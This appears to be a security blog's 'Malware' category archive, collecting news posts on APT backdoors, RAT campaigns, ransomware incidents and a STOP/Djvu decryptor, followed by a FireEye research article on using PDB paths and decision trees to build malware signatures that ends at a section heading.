Category Archives: Malware

“Gilmore Girls” Actress Alexis Bledel Is McAfee’s Most Dangerous Celebrity 2019

You probably know Alexis Bledel from her role as the innocent book worm Rory Gilmore in network television’s “Gilmore Girls” or as shy, quiet Lena Kaligaris in the “Sisterhood of the Travelling Pants” movies. But her most recent role as Ofglen in Hulu’s acclaimed “The Handmaid’s Tale” took a bit of a darker turn. And while Bledel made this dramatic on-screen transition, her rising stardom has in turn made her a prime target for malicious search results online, leading to her coming in at the top of McAfee’s 2019 Most Dangerous Celebrities list.

For the thirteenth year in a row, McAfee researched famous individuals to reveal the riskiest celebrity to search for online or whose search results could expose fans to malicious content. Bledel is joined in the top ten most dangerous celebrities by fellow actresses Sophie Turner (No. 3), Anna Kendrick (No. 4), Lupita Nyong’o (No. 5), and Tessa Thompson (No. 10). Also included in the top ten list are late night talk show hosts James Corden (No. 2) and Jimmy Fallon (No. 6). Rounding out the rest of the top ten are martial arts master Jackie Chan (No. 7) and rap artists Lil Wayne (No. 8) and Nicki Minaj (No. 9).

Many users don’t realize that simple internet searches of their favorite celebrities could potentially lead to malicious content, as cybercriminals often leverage these popular searches to entice users to click on dangerous links. This year’s study emphasizes that today’s streaming culture doesn’t exactly protect users from cybercriminals. For example, Alexis Bledel and Sophie Turner are strongly associated with searches including the term “torrent,” indicating that many fans of “The Handmaid’s Tale” and “Game of Thrones” have been pursuing free options to avoid subscription fees. However, users must understand that torrent or pirated downloads can open themselves up to an abundance of cyberthreats.

So, whether you’re checking out what Alexis Bledel has been up to since “Gilmore Girls” or searching for the latest production of James Corden’s “Crosswalk the Musical,” be a proactive fan and follow these security tips when browsing the internet:

  • Be careful what you click. Users looking for information on their favorite celebrities should be cautious and only click on links to reliable sources for downloads. The safest thing to do is to wait for official releases instead of visiting third-party websites that could contain malware.
  • Refrain from using illegal streaming sites. When it comes to dangerous online behavior, using illegal streaming sites could wreak havoc on your device. Many illegal streaming sites are riddled with malware or adware disguised as pirated video files. Do yourself a favor and stream the show from a reputable source.
  • Protect your online safety with a cybersecurity solution. Safeguard yourself from cybercriminals with a comprehensive security solution like McAfee Total Protection. This can help protect you from malware, phishing attacks, and other threats.
  • Use a website reputation tool. Use a website reputation tool such as McAfee WebAdvisor, which alerts users when they are about to visit a malicious site.
  • Use parental control software. Kids are fans of celebrities too, so ensure that limits are set for your child on their devices and use parental control software to help minimize exposure to potentially malicious or inappropriate websites.

And, of course, to stay updated on all of the latest consumer and mobile security threats, follow me and @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

The post “Gilmore Girls” Actress Alexis Bledel Is McAfee’s Most Dangerous Celebrity 2019 appeared first on McAfee Blogs.

Winnti APT group uses skip-2.0 malware to control Microsoft SQL Servers

Security experts have a new malware, dubbed skip-2.0 used by the China-linked APT group to establish a backdoor in Microsoft SQL Server systems.

Security experts at ESET have discovered a new malware, dubbed skip-2.0, used by the Chinese Winnti cyberespionage group to gain persistence on Microsoft SQL Server systems.

The Winnti group was first spotted by Kaspersky in 2013, according to the researchers the gang has been active since 2007.

The experts believe that under the Winnti umbrella there are several APT groups, including  Winnti, Gref, PlayfullDragon, APT17, DeputyDog, Axiom, BARIUM, LEADPassCV, Wicked Panda, and ShadowPad.

The skip-2.0 malware was used by threat actors to establish a backdoor in MSSQL Server 11 and 12 servers, allowing them to access to any account on the server using a “magic password.” The malicious code is able to remain under the radar thanks to the ability to interact with logging mechanisms.

“Earlier this year, we received a sample of this new backdoor called skip-2.0 by its authors and part of the Winnti Group’s arsenal.” reads the analysis published by ESET researcher Mathieu Tartare. “This backdoor targets MSSQL Server 11 and 12, allowing the attacker to connect stealthily to any MSSQL account by using a magic password – while automatically hiding these connections from the logs. Such a backdoor could allow an attacker to stealthily copy, modify or delete database content.”

The skip-2.0 backdoor has some similarities with other malware in the Winnti Group’s arsenal, such as the PortReuse and ShadowPad backdoors.

The PortReuse backdoor has a modular architecture, experts discovered that its components are separate processes that communicate through named pipes. Experts detected multiple PortReuse variants with a different NetAgent but using the same SK3. Each variant spotted by the experts was targeting different services and ports, including DNS over TCP (53), HTTP (80), HTTPS (443), Remote Desktop Protocol (3389) and Windows Remote Management (5985).

PortReuse was used by the Winnti cyberespionage group to target a high-profile Asian mobile software and hardware manufacturer.

The ShadowPad backdoor is a modular platform that can be used to download and execute arbitrary code on the infected system, create processes, and maintain a virtual file system in the registry,

The remote access capability implemented for the ShadowPad backdoor includes a domain generation algorithm (DGA) for C&C servers which changes every month.

Experts noticed that the three malware use the same VMProtected launcher, the same packer.

The Inner-Loader observed in recent attacks looks for the sqlserv.exe process associated with Microsoft SQL Server, then it injects a payload into this process via the sqllang.dll, giving the malware the ability to hook multiple logging and authentication functions.

“The functions targeted by skip-2.0 are related to authentication and event logging.” continues the analysis.

“The most interesting function is the first one (CPwdPolicyManager::ValidatePwdForLogin), which is responsible for validating the password provided for a given user. This function’s hook checks whether the password provided by the user matches the magic password, in that case, the original function will not be called and the hook will return 0, allowing the connection even though the correct password was not provided.”

Experts pointed out that administrative privileges are required for installing the hooks, this means that skip-2.0 could be delivered only on already compromised MSSQL Servers to achieve persistence.

Pierluigi Paganini

(SecurityAffairs – Winnti, skip-2.0)

The post Winnti APT group uses skip-2.0 malware to control Microsoft SQL Servers appeared first on Security Affairs.

TA505 cybercrime group use SDBbot RAT in recent campaigns

TA505 cybercrime group that operated the Dridex Trojan and Locky ransomware, has been using a new RAT dubbed SDBbot in recent attacks.

Security experts at Proofpoint observed the notorious TA505 cybercrime group that has been using a new RAT dubbed SDBbot in recent attacks.

The TA505 group, that is known to have operated both the Dridex and Locky malware families, continues to make small changes to its operations. TA505 hacking group has been active since 2014 focusing on Retail and banking sectors.

SDBbot is a backdoor that is delivered via a new downloader dubbed Get2 that was written in C++. The dropper was also used to distribute other payloads, including FlawedGrace, FlawedAmmyy, and Snatch.

The new downloader Get2 was first observed in early September when the groups used it in targeted attacks against financial institutions in Greece, Singapore, United Arab Emirates, Georgia, Sweden, Lithuania, and a few other countries.

On September 20, new phishing attacks involved thousands of emails, with English and French lures, attempting to deliver Microsoft Excel and .ISO attachments to targets in the United States and Canada.

The TA505 group started delivering SDBbot in early October, it used weaponized Microsoft Office documents leveraging the Get2 downloader.

“On October 7, instead of directly attached malicious Microsoft Excel files, Proofpoint researchers observed thousands of emails containing URL shortener links redirecting to a landing page that in turn links to an Excel sheet “request[.]xls”. This campaign only used the English language and targeted companies from various industries primarily in the United States.” reads the analysis published by Proofpoint.

SDBbot RAT

SDBbot is a new remote access Trojan (RAT) written in C++ that has been delivered by the Get2 downloader in recent TA505 campaigns. Its name is derived from the debugging log file (sdb.log.txt) and DLL name (BotDLL[.]dll) used in the initial analyzed sample. It also makes use of application shimming [1] for persistence.

The attackers switched from attachments to shortened URLs that point to a malicious Excel sheet, the attacks mainly targeted organizations in the United States.

Experts discovered that the Get2 downloader also implements information-gathering capabilities. It collects basic system information and sends it back to an hardcoded C&C via an HTTP POST request.

The SDBbot RAT has three main components, an installer, a loader, and a backdoor component.

The installer is used to store the RAT in the registry and establish persistence for the loader, while if the bot is running with admin privileges on a Windows version newer than Windows 7, persistence is established using the registry “image file execution options” method. If the bot is running as admin on Windows XP or 7, persistence is established using application shimming

“All three of the persistence mechanisms require a reboot to take effect and there is no additional code to continue executing the loader and RAT components from the installer. Proofpoint researchers speculate that the reboot functionality in the Get2 downloader (described above) is used to continue SDBbot’s execution after installation in the TA505 campaigns.” continues the analysis.

The loader is used to execute the loader shellcode from the binary blob that is stored in the registry that decompresses the RAT and loads and executes a DLL.

The RAT component supports typical RAT functionalities, including command shell, video recording of the screen, remote desktop, port forwarding, and file system access.

“The new Get2 downloader, when combined with the SDBbot as its payload appears to be TA505’s latest trick (or treat) for the Fall of 2019,” Proofpoint concludes.

Pierluigi Paganini

(SecurityAffairs – SDBbot RAT, TA505)

The post TA505 cybercrime group use SDBbot RAT in recent campaigns appeared first on Security Affairs.

Security Affairs newsletter Round 236

A new round of the weekly newsletter arrived! The best news of the week with Security Affairs

Hi folk, let me inform you that I suspended the newsletter service, anyway I’ll continue to provide you a list of published posts every week through the blog.

A new Mac malware dubbed Tarmac has been distributed via malvertising campaigns
Alabama Hospital chain paid ransom to resume operations after ransomware attack
Charming Kitten Campaign involved new impersonation methods
Imperva explains how hackers stole AWS API Key and accessed to customer data
Is Emotet gang targeting companies with external SOC?
Privacy advocates criticize Apple for sharing some users browsing data with Tencent
Talos experts found 11 flaws in Schneider Electric Modicon Controllers
Click2Mail suffered a data breach that potentially impacts 200,000 registrants
Global Shipping and mailing services firm Pitney Bowes hit by ransomware attack
sudo flaw allows any users to run commands as Root on Linux
Winnti Group was planning a devastating supply-chain attack against Asian manufacturer
Adobe out-of-band security updates address 82 flaws in 3 products
Approaching the Reverse Engineering of a RFID/NFC Vending Machine
Chinese-speaking cybercrime gang Rocke changes tactics
Signature update for Symantec Endpoint protection crashed many device
Critical and high-severity flaws addressed in Cisco Aironet APs
Cryptocurrency miners infected more than 50% of the European airport workstations
Graboid the first-ever Cryptojacking worm that targets Docker Hub
International operation dismantled largest Dark Web Child abuse site
M6 Group, largest France private multimedia group, hit by ransomware attack
China-linked cyberspies Turbine PANDA targeted aerospace firms for years
Pitney Bowes revealed that its systems were infected with Ryuk Ransomware
Researcher released PoC exploit code for CVE-2019-2215 Android zero-day flaw
Systems at Ingredients provider Ingredion infected with a Malware
Trojanized Tor Browser targets shoppers of Darknet black marketplaces
A critical Linux Wi-Fi bug could be exploited to fully compromise systems
Emsisoft released a free decryption tool for the STOP (Djvu) ransomware
Hundreds of millions of UC Browser Android Users Exposed to MiTM Attacks. Again.

Pierluigi Paganini

(SecurityAffairs – iCloud, zero-day)

The post Security Affairs newsletter Round 236 appeared first on Security Affairs.

Emsisoft released a free decryption tool for the STOP (Djvu) ransomware

Emsisoft firm has released a new free decryption tool the STOP (Djvu) ransomware, in the last months the research team helped victims of many other threats.

STOP (Djvu) ransomware has 160 variants that infected more hundreds of thousands of victims worldwide. Experts estimated a total number of 460,000 victims, that makes this threat the most active and widespread ransomware today.

According to data included in Emsisoft Ransomware Statistics report for Q2 and Q3 2019, Djvu ransomware accounts for more than half of all the ransomware submissions throughout the world.

For the first time, a decryptor used a side-channel attack on the ransomware’s keystream.

“We’ll be breaking STOP’s encryption via a side-channel attack on the ransomware’s keystream. As far as we know, it’s the first time this method has been used to recover ransomware-encrypted files on such a large scale.” reads the post published by Emsisoft.

The Divu ransomware encrypts victim’s files with Salsa20, and appends one of dozens of extensions to filenames, such as “.djvu”, “.rumba”, “.radman”, “.gero”, etc.

The price of the private key and decrypt software is $980, victims can receive a 50% discount if they contact the crooks in the first 72 hours.

The Djvu ransomware is mainly delivered through key generators and cracks, experts pointed out that some versions of STOP also bundle additional malicious payloads, including password-stealers.

The decryptor released by Emsisoft can recover for free files encrypted by 148 of the 160 variants, this means that approximately 70% of victims will be able to recover their data. Unfortunately, currently it is not possible to decrypt files encrypted by the remaining 12 variants.

Below key findings shared by the company:

  • The tool will recover files encrypted by 148 of the 160 known STOP variants and will enable approximately 70% of victims to recover their data without paying the ransom.
  • STOP has claimed more victims than any other currently active ransomware: 116k confirmed and 460K estimated.
  • The encryption is being broken via a side-channel attack on the keystream. This will be the first time ransomware has been decrypted this way on such a large scale (as far as we know). 
  • Because of the number of victims, we will not be able to provide one-on-one help for those who need assistance using the tool. The volunteer community at Bleeping Computer has, however, agreed to act as an unofficial support channel for this tool and will be providing help to those who need it. We greatly appreciate their efforts and willingness to help. Some words from Bleeping Computer’s Lawrence Abrams are below. 

Download the STOP Djvu Decryptor here

Pierluigi Paganini

(SecurityAffairs – Djvu ransomware, malware)

The post Emsisoft released a free decryption tool for the STOP (Djvu) ransomware appeared first on Security Affairs.

Systems at Ingredients provider Ingredion infected with a Malware

The US ingredient provider Ingredion Incorporated announced that it has recently detected suspicious activity associated with a malware attack.

The US ingredient provider Ingredion Incorporated revealed to have detected an ongoing malware attack after its experts noticed a suspicious activity this week. Ingredion has hired third-party experts to help its staff in investigating the incident and restoring the affected systems.

At the time of writing, the company did not provide details about the attack, Ingredion only said that there is no evidence that hackers accessed to customer, supplier or employee data.

“The company warns that it has called in external experts to assist with restoring affected servers, and there may be some delays in transactions with customers and suppliers.” reported SecurityWeek.

“The ingredient solutions provider admitted that it “will take time” to restore some of the impacted systems.”

Ingredion

Experts believe that the company was infected with a piece of ransomware.

Recently the global shipping and mailing services company Pitney Bowes suffered a security incident, today the company published an update on the attack and confirmed that the root cause of the disruptions of its services was “the Ryuk virus malware attack.”

Pierluigi Paganini

(SecurityAffairs – Ingredion, malware)

The post Systems at Ingredients provider Ingredion infected with a Malware appeared first on Security Affairs.

Threat Roundup for October 11 to October 18

Today, Talos is publishing a glimpse into the most prevalent threats we’ve observed between Oct 11 and Oct 18. As with previous roundups, this post isn’t meant to be an in-depth analysis. Instead, this post will summarize the threats we’ve observed by highlighting key behavioral characteristics, indicators of compromise, and discussing how our customers are automatically protected from these threats.

As a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. Additionally, please keep in mind that IOC searching is only one part of threat hunting. Spotting a single IOC does not necessarily indicate maliciousness. Detection and coverage for the following threats is subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, Snort.org, or ClamAV.net.

Read More

Reference:

TRU10182019 – This is a JSON file that includes the IOCs referenced in this post, as well as all hashes associated with the cluster. The list is limited to 25 hashes in this blog post. As always, please remember that all IOCs contained in this document are indicators, and that one single IOC does not indicate maliciousness. See the Read More link above for more details.

What to consider before investing in Cloud Security Competency?

Estimated reading time: 2 minutes

American market research giant Forrester estimated in 2017 that the value of the public cloud market would reach at least $191 billion by 2020. This surge in the valuation is driven by the growing acceptance of cloud computing by enterprises in this decade.

Organizations are increasingly embracing doing business on the cloud for the various advantages it offers. They are attracted by the fact that cloud computing offers a way to reduce costs in their information technology department by eliminating physical infrastructure and leveraging the cloud solution provider’s resources.

Cloud computing offers many benefits

By hosting the business on the cloud, enterprises can be leaner and more flexible, with employees being able to access essential data, information and applications from wherever they travel. In summation, the next decade will see many more enterprises move to the cloud as we enter the era of the gig economy.

However, there continues to remain legitimate concerns about the security of cloud computing which inhibits many enterprises from exploring this course of action. By moving to the cloud, enterprises do embrace flexibility but also open themselves up to a whole new set of cybersecurity challenges, involving:

The possibility of a data breach

When enterprise data is stored in the cloud, there are fears about the possible repercussions of a data breach. Since the data is stored on a cloud provided by a third-party provider, questions are always asked about the downtime involved and the backup methods used.

The question of compliance

Enterprises from different sectors have to grapple with various regulations on the storage of data. This is a problem that gets compounded when it comes to storing such data on the cloud.

Hacked interfaces and APIs

Almost all cloud services now provide APIs (Application Programming Interface) – APIs are required by organizations to manage and interact with the cloud service they are using. Therefore, the security of the cloud service largely depends on the security of APIs. These are the most vulnerable part of the system as they are directly exposed and are accessible via the Internet.

It’s these security considerations that are major factors for an enterprise looking for competency before investing in the cloud. Before shortlisting a cloud security provider, enterprises should consider the following pointers:

Multi-factor authentication

Enterprises must check whether their cloud security provider provides the functionality of multi-factor authentication. As mentioned earlier, data breaches pose a significant threat to cloud computing but turning on multi-factor authentication is a credible defence against this threat.

Access control

Working on a cloud environment does not take away the threat of insider breaches. To protect an enterprise from insider threats, cloud security must also provide access control functionality, limiting the access users have to the system.

Data storage

Before investing in cloud security, enterprises must be aware of how their data is being stored in the cloud. Whether these are malicious attacks or natural disasters, cloud data should be ideally distributed in multiple locations. This serves business continuity as well as data recovery in case of an unfortunate event.

Offers both security and compliance

An investment in cloud security should enable the enterprise to enjoy both top-of-the-line security and also comply with territorial and global regulations.

The era of cloud computing promises to unlock productivity and efficiency for enterprises, provided they ensure the investment has been made in the correct security competencies. Seqrite Cloud provides an integrated solution that allows the management and regulation of multiple Endpoint Security and UTM products deployed at different geographical locations.

The post What to consider before investing in Cloud Security Competency? appeared first on Seqrite Blog.

Cryptojacking worm compromised over 2,000 Docker hosts

Security researchers have discovered a cryptojacking worm that propagates using containers in the Docker Engine (Community Edition) and has spread to more than 2,000 vulnerable Docker hosts. “The attacker compromised an unsecured Docker daemon, ran the malicious Docker container pulled from Docker Hub, downloaded a few scripts and a list of vulnerable hosts from C2 and repeatedly picked the next target to spread the worm,” Palo Alto Networks’s Unit 42 researchers explained. A worm named … More

The post Cryptojacking worm compromised over 2,000 Docker hosts appeared first on Help Net Security.

Pitney Bowes revealed that its systems were infected with Ryuk Ransomware

The global shipping and mailing services company Pitney Bowes revealed that the recent partial outage was caused by the Ryuk ransomware.

The global shipping and mailing services company Pitney Bowes recently suffered a partial outage of its service caused by a ransomware attack. Pitney Bowes is a global technology company that provides commerce solutions in the areas of ecommerce, shipping, mailing, data and financial services.

The company now published an update on the attack, it confirmed that the root cause of the disruptions of its services was “the Ryuk virus malware attack.”

“This is an update to the status of Pitney Bowes recovery from the Ryuk virus malware attack on some of our systems that disrupted client access to some of our services.” reads the update shared by the company. “Upon discovery of the attack, with the support of third-party advisors, we immediately began working on a plan and thorough process of systems restoration with the goal of restoring service as quickly as possible. We have also been reaching out to our clients, partners, and employees.”

The mailing system products were paralyzed by the attack, the company confirmed that immediately after the attack the following systems were NOT working:

  • Clients are unable to refill postage or upload transactions on their mailing machine
  • SendPro Online in the UK and Canada
  • Hosted instances of SendSuite Live, SendSuite Express, SendSuite Tracking (SST)
  • Accounting solutions such as Inview, Business Manager and Account List Management
  • Your Account and the Pitney Bowes Supplies web store cannot be accessed. This in turn impacts clients subscribed to AutoInk and our Supplies App

The company announced that currently it has restored many of the impacted systems.

The Ryuk ransomware was involved in a long string of attacks targeting cities, hospitals, and organizations worldwide.

In September New Bedford city was infected with Ryuk ransomware, but did not pay $5.3M ransom. In April, systems at Stuart City were infected by the same Ryuk ransomware, in early March, Jackson County, Georgia, was hit by the same ransomware that paralyzed the government activity until officials decided to pay a $400,000 ransom to decrypt the files.

Pierluigi Paganini

(SecurityAffairs – Ryuk Ransomware, Pitney Bowes)

The post Pitney Bowes revealed that its systems were infected with Ryuk Ransomware appeared first on Security Affairs.

Cryptocurrency miners infected more than 50% of the European airport workstations

Researchers at Cyberbit spotted a crypto mining campaign that infected more than 50% of the European airport workstations. 

Security experts at Cyberbit have uncovered a crypto mining campaign that infected more than 50% of the European airport workstations. 

European airport systems were infected with a Monero cryptocurrency miner that was linked to the Anti-CoinMiner campaign discovered this summer by Zscaler researchers.  

“While rolling out Cyberbit’s  Endpoint Detection and Response (EDR) in an international airport in Europe, our researchers identified an interesting crypto mining infection, where cryptocurrency mining software was installed on more than 50% of the airport’s workstations.” reads the analysis published by Cyberbit.

Experts pointed out that the Monero miners were installed on the European airport systems, even if they were running an industry-standard antivirus. Threat actors were able to package the miner evading the detection of ordinary antivirus.

“The malware we found was first discovered by Zscaler more than a year ago,” continues Cyberbit. “It was modified just enough to evade the vast majority of existing signatures for it, with only 16 out of 73 detection products on VirusTotal detecting the sample as malicious.”

The good news is that the miner did not impact the airport’s operations.

Experts’ behavioral engine detected a suspicious usage of the PAExec tool used to execute an application named player.exe.

PAExec is a redistributable version of the legitimate Microsoft PSExec tool that is used to run Windows programs on remote systems without having to physically install software on them. The execution of the PAExec tool is often associated with an ongoing attack, in this case, hackers used it for to launch the Player executable “in system mode.”

Experts also observed the use of Reflective DLL Loading after running player.exe. The technique allows the attackers to remotely inject a DLL directly into a process in memory.

“This impacts the performance of other applications, as well as that of the airport facility. The use of administrative privileges also reduces the ability for security tools to detect the activity.” continues the report.

In order to gain persistence, attackers added an entry in the systems’ registries for the PAExec.

At the time, researchers were not able to determine how attackers infected the European Airport systems.

“Because the malware happened to be a cryptominer, its business impact was relatively minor, limited to performance degradations leading to quality of service and service interruptions, as well as a significant increase in power consumption throughout the airport.” concludes Cyberbit.

“In a worst-case scenario, attackers could have breached the IT network as a means to hop onto the airport’s OT network in order to compromise critical operational systems ranging from runway lights to baggage handling machines and the air-train, to name a few of the many standard airport OT systems that could be cyber-sabotaged to cause catastrophic physical damage,”

Pierluigi Paganini

(SecurityAffairs – European airport workstations, miner)

The post Cryptocurrency miners infected more than 50% of the European airport workstations appeared first on Security Affairs.

Definitive Dossier of Devilish Debug Details – Part Deux: A Didactic Deep Dive into Data Driven Deductions

In Part One of this blog series, Steve Miller outlined what PDB paths are, how they appear in malware, how we use them to detect malicious files, and how we sometimes use them to make associations about groups and actors.

As Steve continued his research into PDB paths, we became interested in applying more general statistical analysis. The PDB path as an artifact poses an intriguing use case for a couple of reasons.

­First, the PDB artifact is not directly tied to the functionality of the binary. As a byproduct of the compilation process, it contains information about the development environment, and by proxy, the malware author themselves. Rarely do we encounter static malware features with such an interesting tie to the human behind the keyboard, rather than the functionality of the file.

Second, file paths are an incredibly complex artifact with many different possible encodings. We had personally been dying to find an excuse to spend more time figuring out how to parse and encode paths in a more useful way. This presented an opportunity to dive into this space and test different approaches to representing file paths in various models.

The objectives of our project were:

  1. Build a large data set of PDB paths and apply some statistical methods to find potentially new signature terms and logic.
  2. Investigate whether applying machine learning classification approaches to this problem could improve our detection above writing hand-crafted signatures.
  3. Build a PDB classifier as a weak signal for binary analysis.

To start, we began gathering data. Our dataset, pulled from internal and external sources, started with over 200,000 samples. Once we deduplicated by PDB path, we had around 50,000 samples. Next, we needed to consistently label these samples, so we considered various labeling schemes.

Labeling Binaries With PDB Paths

For many of the binaries we had internal FireEye labels, and for others we looked up hashes on VirusTotal (VT) to have a look at their detection rates. This covered the majority of our samples. For a relatively small subset we had disagreements between our internal engine and VT results, which merited a slightly more nuanced policy. The disagreement was most often that our internal assessment determined a file to be benign, but the VT results showed a nonzero percentage of vendors detecting the file as malicious. In these cases we plotted the ‘VT ratio”: that is, the percentage of vendors labeling the files as malicious (Figure 1).


Figure 1: Ratio of vendors calling file bad/total number of vendors

The vast majority of these samples had VT detection ratios below 0.3, and in those cases we labeled the binaries as benign. For the remainder of samples we tried two strategies – marking them all as malicious, or removing them from the training set entirely. Our classification performance did not change much between these two policies, so in the end we scrapped the remainder of the samples to reduce label noise.

Building Features

Next, we had to start building features. This is where the fun began. Looking at dozens and dozens of PDB paths, we simply started recording various things that ‘pop out’ to an analyst. As noted earlier, a file path contains tons of implicit information, beyond simply being a string-based artifact. Some analogies we have found useful is that a file path is more akin to a geographical location in its representation of a location on the file system, or like a sentence in that it reflects a series of dependent items.

To further illustrate this point, consider a simple file path such as:

C:\Users\World\Desktop\duck\Zbw138ht2aeja2.pdb (source file)

This path tells us several things:

  • This software was compiled on the system drive of the computer
  • In a user profile, under user ‘World’
  • The project is managed on the Desktop, in a folder called ‘duck’
  • The filename has a high degree of entropy and is not very easy to remember

In contrast, consider something such as:

D:\VSCORE5\BUILD\VSCore\release\EntVUtil.pdb (source file)

This indicates:

  • Compilation on an external or secondary drive
  • Within a non-user directory
  • Contains development terms such as ‘BUILD’ and ‘release’
  • With a sensible, semi-memorable file name

These differences seem relatively straightforward and make intuitive sense as to why one might be representative of malware development whereas the other represents a more “legitimate-looking” development environment.

Feature Representations

How do we represent these differences to a model? The easiest and most obvious option is to calculate some statistics on each path. Features such as folder depth, path length, entropy, and counting things such as numbers, letters, and special characters in the PDB filename are easy to compute.

However, upon evaluation against our dataset, these features did not help to separate the classes very well. The following are some graphics detailing the distributions of these features between our classes of malicious and benign samples:

While there is potentially some separation between benign and malicious distributions, these features alone would likely not lead to an effective classifier (we tried). Additionally, we couldn’t easily translate these differences into explicit detection rules. There was more information in the paths that we needed to extract, so we began to look at how to encode the directory names themselves.

Normalization

As with any dataset, we had to undertake some steps to normalize the paths. For example, the occurrence of individual usernames, while perhaps interesting from an intelligence perspective, would be represented as distinct entities when in fact they have the same semantic meaning. Thus, we had to detect and replace usernames with <username> to normalize this representation. Other folder idiosyncrasies such as version numbers or randomly generated directories could similarly be normalized into <version> or <random>.

A typical normalized path might therefore go from this:

C:\Users\jsmith\Documents\Visual Studio 2013\Projects\mkzyu91952\mkzyu91952\obj\x86\Debug\mkzyu91952.pdb

To this:

c:\users\<username>\documents\visual studio 2013\projects\<random>\<random>\obj\x86\debug\mkzyu91952.pdb

You may notice that the PDB filename itself was not normalized. In this case we wanted to derive features from the filename itself, so we left it. Other approaches could be to normalize it, or even to make note that the same filename string ‘mkzyu91952’ appears earlier in the path. There are endless possible features when dealing with file paths.

Directory Analysis

Once we had normalized directories, we could start to “tokenize” each directory term, to start performing some statistical analysis. Our main goal of this analysis was to see if there were any directory terms that highly corresponded to maliciousness, or see if there were any simple combinations, such as pairs or triplets, that exhibited similar behavior.

We did not find any single directory name that easily separated the classes. That would be too easy. However, we did find some general correlations with directories such as “Desktop” being somewhat more likely to be malicious, and use of shared drives such as Z: to be more indicative of a benign file. This makes intuitive sense given the more collaborative environment a “legitimate” software development process might require. There are, of course, many exceptions and this is what makes the problem tricky.

Another strong signal we found, at least in our dataset, is that when the word “Desktop” was in a non-English language and particularly in a different alphabet, the likelihood of that PDB path being tied to a malicious file was very high (Figure 2). While potentially useful, this can be indicative of geographical bias in our dataset, and further research would need to be done to see if this type of signature would generalize.


Figure 2: Unicode desktop folders from malicious samples

Various Tokenizing Schemes

In recording the directories of a file path, there are several ways you can represent the path. Let’s use this path to illustrate these different approaches:

c:\Leave\smell\Long\ruleThis.pdb (file)

Bag of Words

One very simple way is the “bag-of-words” approach, which simply treats the path as the distinct set of directory names it contains. Therefore, the aforementioned path would be represented as:

[‘c:’,’leave’,’smell’,’long’,’rulethis’]

Positional Analysis

Another approach we considered was recording the position of each directory name, as a distance from the drive. This retained more information about depth, such that a ‘build’ directory on the desktop would be treated differently than a ‘build’ directory nine directories further down. For this purpose, we excluded the drives since they would always have the same depth.

[’leave_1’,’smell_2’,’long_3’,’rulethis_4’]

N-Gram Analysis

Finally, we explored breaking paths into n-grams; that is, as a distinct set of n- adjacent directories. For example, a 2-gram representation of this path might look like:

[‘c:\leave’,’leave\smell’,’smell\long’,’long\rulethis’]

We tested each of these approaches and while positional analysis and n-grams contained more information, in the end, bag-of-words seemed to generalize best. Additionally, using the bag-of-words approach made it easier to extract simple signature logic from the resultant models, as will be shown in a later section.

Term Co-Occurrence

Since we had the bag-of-words vectors created for each path, we were also able to evaluate term co-occurrence across benign and malicious files. When we evaluated the co-occurrence of pairs of terms, we found some other interesting pairings that indeed paint two very different pictures of development environments (Figure 3).

Correlated with Malicious Files

Correlated with Benign Files

users, desktop

src, retail

documents, visual studio 2012

obj, x64

local, temporary projects

src, x86

users, projects

src, win32

users, documents

retail, dynamic

appdata, temporary projects

src, amd64

users, x86

src, x64

Figure 3: Correlated pairs with malicious and benign files

Keyword Lists

Our bag-of-words representation of the PDB paths then gave us a distinct set of nearly 70,000 distinct terms. The vast majority of these terms occurred once or twice in the entire dataset, resulting in what is known as a ‘long-tailed’ distribution. Figure 4 is a graph of only the top 100 most common terms in descending order.


Figure 4: Long tailed distribution of term occurrence

As you can see, the counts drop off quickly, and you are left dealing with an enormous amount of terms that may only appear a handful of times. One very simple way to solve this problem, without losing a ton of information, is to simply cut off a keyword list after a certain number of entries. For example, take the top 50 occurring folder names (across both good and bad files), and save them as a keyword list. Then match this list against every path in the dataset. To create features, one-hot encode each match.  

Rather than arbitrarily setting a cutoff, we wanted to know a bit more about the distribution and understand where might be a good place to set a limit – such that we would cover enough of the samples without drastically increasing the number of features for our model. We therefore calculated the cumulative number of samples covered by each term, as we iterated down the list from most common to least common. Figure 5 is a graph showing the result.


Figure 5: Cumulative share of samples covered by distinct terms

As you can see, with only a small fraction of the terms, we can arrive at a significant percentage of the cumulative total PDB paths. Setting a simple cutoff at about 70% of the dataset resulted in roughly 230 terms for our total vocabulary. This gave us enough information about the dataset without blowing up our model with too many features (and therefore, dimensions). One-hot encoding the presence of these terms was then the final step in featurizing the directory names present in the paths.

YARA Signatures Do Grow on Trees

Armed with some statistical features, as well as one-hot encoded keyword matches, we began to train some models on our now-featurized dataset. In doing so, we hoped to use the model training and evaluation process to give us insights into how to build better signatures. If we developed an effective classification model, that would be an added benefit.

We felt that tree-based models made sense for this use case for two reasons. First, tree-based models have worked well in the past in domains requiring a certain amount of interpretability and using a blend of quantitative and categorical features. Second, the features we used are largely things we could represent in a YARA signature. Therefore, if our models built boolean logic branches that separated large numbers of PDB files, we could potentially translate these into signatures. This is not to say that other model families could not be used to build strong classifiers. Many other options ranging from Logistic Regression to Deep Learning could be considered.

We fed our featurized training set into a Decision Tree, having set a couple ‘hyperparameters’ such as max depth and minimum samples per leaf, etc. We were also able to use a sliding scale of these hyperparameters to dynamically create trees and, essentially, see what shook out. Examining a trained decision tree such as the one in Figure 6 allowed us to immediately build new signatures.


Figure 6: Example decision tree and decision paths

We found several other interesting tidbits within our decision trees. Some terms that resulted in completely or almost-completely malicious subgroups are:

Directory Term

Example Hashes

\poe\

a6b2aa2b489fb481c3cd9eab2f4f4f5c

92904dc99938352525492cd5133b9917

444be936b44cc6bd0cd5d0c88268fa77

\xampp\

4d093061c172b32bf8bef03ac44515ae

4e6c2d60873f644ef5e06a17d85ec777

52d2a08223d0b5cc300f067219021c90

\temporary projects\

a785bd1eb2a8495a93a2f348c9a8ca67

c43c79812d49ca0f3b4da5aca3745090

e540076f48d7069bacb6d607f2d389d9

\stub\

5ea538dfc64e28ad8c4063573a46800c

adf27ce5e67d770321daf90be6f4d895

c6e23da146a6fa2956c3dd7a9314fc97

We also found the term ‘WindowsApplication1’ to be quite useful. 89% of the files in our dataset containing this directory were malicious. Cursory research indicates that this is the default directory generated when using Visual Studio to compile a Windows binary. Once again, this makes some intuitive sense for finding malware authors. Training and evaluating decision trees with various parameters turned out to be a hugely productive exercise in discovering potential new signature terms and logic.

Classification Accuracy and Findings

